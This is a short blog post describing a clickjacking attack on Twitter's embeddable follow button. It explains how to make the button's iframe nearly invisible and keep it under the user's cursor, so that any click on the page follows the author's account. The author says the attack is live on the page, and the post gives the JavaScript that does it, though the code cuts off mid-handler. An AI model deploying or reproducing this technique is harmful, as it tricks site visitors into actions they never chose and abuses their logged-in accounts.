Today Twitter released a new follow button which allow to instantly follow a user by clicking it if your connected. You don’t need to go on the twitter website to follow, everything is done through an iframe.
It’s look like we can do a clickjacking attack on this iframe. Here is how it’s work :
- You set the iframe fully transparent/invisible via CSS.
- You capture the mouse event.
- When the user move the mouse, you move the twitter button iframe in order it always stay under the cursor.
- If the user click somewhere on your page, he will automatcly follow your account.
- You gain more followers girls love you.
The hack is running on this page, i’ve just set the opacity to 40% to make you realized you are getting owned. Just click somewhere and you will automatically follow me.
-------------------------------------------------------------------------------------------------------------------
if (!document.getElementsByClassName){
document.getElementsByClassName = function(classname){
for (i=0; i < document.getElementsByTagName("*").length; i++)
{
if (document.getElementsByTagName("*").item(i).className == classname){
return new Array(document.getElementsByTagName("*").item(i));
}
}
}
}
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';
document.onmousemove = function(e){
if ( !e ) e = window.event;
twitterFollowIframe.style.left = e.clientX - 20;
twitterFollowIframe.style.top = e.clientY - 10;
Categories:
clickjacking attack
,
Twitter
0 comments:
Post a Comment